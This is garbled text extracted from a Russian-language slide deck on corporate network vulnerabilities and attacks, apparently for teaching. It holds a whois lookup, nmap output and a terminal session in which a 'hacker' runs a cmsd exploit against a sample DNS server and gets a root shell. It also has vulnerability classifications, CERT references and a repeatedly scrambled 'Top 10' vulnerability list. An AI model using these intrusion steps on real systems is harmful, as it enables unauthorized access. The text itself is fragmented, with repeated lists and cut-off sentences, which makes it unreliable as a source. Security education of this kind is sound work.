Презентация на тему Типовая корпоративная сеть, понятие уязвимости и атаки

узлу (возможно с минимальными привилегиями)
Получение полного контроля над одним

Повышение уровня привилегий или использование узла в качестве платформы для исследования других узлов сети

Atlanta, GA 30338

Domain Name: ACMETRADE.COM

http://www.networksolutions.com/cgi-bin/whois/whois/?STRING=acmetrade.com

fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on (200.0.0.143):
(The 1516 ports

on port 33505
hacker:/export/home/hacker>

SUNW,UltraSPARC-IIi-Engine
hacker:/export/home/hacker>
./cmsd dns.acmetrade.com
using source port 53
rtable_create worked
Exploit successful. Portshell created

hacker:/export/home/hacker>

Trying 208.21.2.67...
Connected to dns.acmetrade.com.
Escape character is '^]'.

#

id

uid=0(root) gid=0(root)

#

uname -a

SunOS dns 5.5.1 Generic_103640-24 sun4m sparc SUNW,SPARCstation-5

#

telnet dns.acmetrade.com 33505

Этап получения доступа к узлу

в качестве платформы для исследования других узлов сети

приводит к реализации угрозы путем использования уязвимостей информационной системы.
Уязвимость

служб)
ошибки реализации (программ)
ошибки эксплуатации (неправильная настройка, неиспользуемые сетевые службы, слабые

системы
Уровень баз данных
Уровень персонала
Уровень приложений

по уровню (степени) риска
Уязвимости, позволяющие атакующему получить непосредственный доступ

Уязвимости, позволяющие атакующему получить доступ к информации, которая с высокой степенью вероятности позволит в последствии получить доступ к узлу

Уязвимости, позволяющие злоумышленнику осуществлять сбор критичной информации о системе

- координационный центр CERT/CC
www.iss.net/xforce -

llnl.ciac.gov - центр CIAC

www.cert.ru - российский CERT/CC

www.securityfocus.com

ошибки реализации
Описание: посылка большого числа одинаковых фрагментов IP-датаграммы

ошибки реализации
Описание: проблема одной из функций ядра ОС Windows

Примеры уязвимостей

ошибки реализации
Описание: уязвимость в реализации возможности подключения со стороны

Примеры уязвимостей

ошибки реализации
Описание: посылка большого числа некорректно построенных запросов приводит

Примеры уязвимостей

ошибки реализации
Описание: OC Windows 2000 и Windows 98 уязвимы

Примеры уязвимостей

ошибки обслуживания
Описание: узел заражён серверной частью троянского коня, позволяющей

Примеры уязвимостей

уязвимости
Обеспечение совместимости баз данных уязвимостей

(spoofed SYN)


Impossible IP Packet
Bugtrag
CA-97.28.Teardrop_Land
Land
NT4-SP3and 95 [latierra.c]



Уязвимость Land IP denial

RealSecure
Cisco Database
Axent NetRecon

in authenticate command.

Reference: CERT:CA-98.09.imapd
Reference: SUN:00177
Reference: BID:130

Номер

Описание

Ссылки

атаки (отказ в обслуживании)
Получение конфиденциальной информации
Модификация или

Получение полного контроля над
объектом атаки

и объект атаки находятся в одном сегменте
Атакующий и объект

Маршру-тизатор

активность (разведка)
Запуск кода (программы) на объекте атаки
Бесполезное расходование вычислительных

Нарушение навигации (ложный маршрут)

Пассивное прослушивание

Security Systems

политика)
3. IIS (Microsoft Internet Information Server)
4. Уязвимости СУБД
5. Уязвимости

6. Электронная почта

7. Разграничение доступа к общим ресурсам

8. RPC (удаленные процедуры)

9. Bind

1. Выведение из строя («Denial of Service»)

3. IIS (Microsoft Internet Information Server)
4. Open Databases
5. E-Business

6. Open Sendmail

7. File Sharing

8. RPC

9. Bind

1. Denial of Service Exploits

kiddie exploits
Poor coding standards
Переполнение буфера в Linux - приложениях

Server)
4. Open Databases
5. E-Business Web Applications
6. Open

7. File Sharing

8. RPC

1. Denial of Service Exploits

10. Linux Buffer Overflows

9. Bind

Top 10

activated buffer-overflow, client request to server, script kiddie
BIND

Server)
4. Open Databases
5. E-Business Web Applications
6. Open

7. File Sharing

1. Denial of Service Exploits

9. Bind

10. Linux Buffer Overflows

8. RPC (Remote Procedure Calls)

Top 10

(linux-mountd-bo)

7. File Sharing
2. Weak Accounts
3. IIS (Microsoft Internet

4. Open Databases

5. E-Business Web Applications

6. Open Sendmail

1. Denial of Service Exploits

Top 10

Unix - серверов
Предоставление доступа к общим ресурсам

Server)
4. Open Databases
5. E-Business Web Applications

7. File Sharing

8. RPC

9. Bind

10. Linux Buffer Overflows

6. Open E-mail (электронная почта)

Top 10

типа «ILOVEYOU»

Server)
4. Open Databases
1. Denial of Service Exploits

6. Open E-mail

7. File Sharing

8. RPC

9. Bind

10. Linux Buffer Overflows

5. E-Business Web Applications

Top 10

“path info”
Frontpage Extensions (frontpage-ext) “readable passwords”
FrontpagePwdAdministrators
(frontpage-pwd-administrators) “reveal

Server)
1. Denial of Service Exploits
5. E-Business Web

6. Open E-mail

7. File Sharing

8. RPC

9. Bind

10. Linux Buffer Overflows

4. Open Databases

Top 10

Server Xp_sprintf buffer overflow
SQL Server Xp_cmdshell extended

6. Open E-mail
7. File Sharing
8. RPC
9. Bind
10. Linux

3. IIS (Microsoft Internet Information Server)

2. Weak Accounts

1. Denial of Service Exploits

Top 10

Execution
PWS File Access
CGI Lasso “read arbitrary files”
PHP3

5. E-Business Web Applications
6. Open E-mail
7. File Sharing

8. RPC

9. Bind

10. Linux Buffer Overflows

2. Weak Accounts (слабые пароли)

1. Denial of Service Exploits

Top 10

strings set

Server)
4. Open Databases
5. E-Business Web Applications
6. Open

7. File Sharing

8. RPC

9. Bind

10. Linux Buffer Overflows

1. Denial of Service Exploits

Top 10

(W9x/2K/NT)
Настройка времени и цели
Распределённость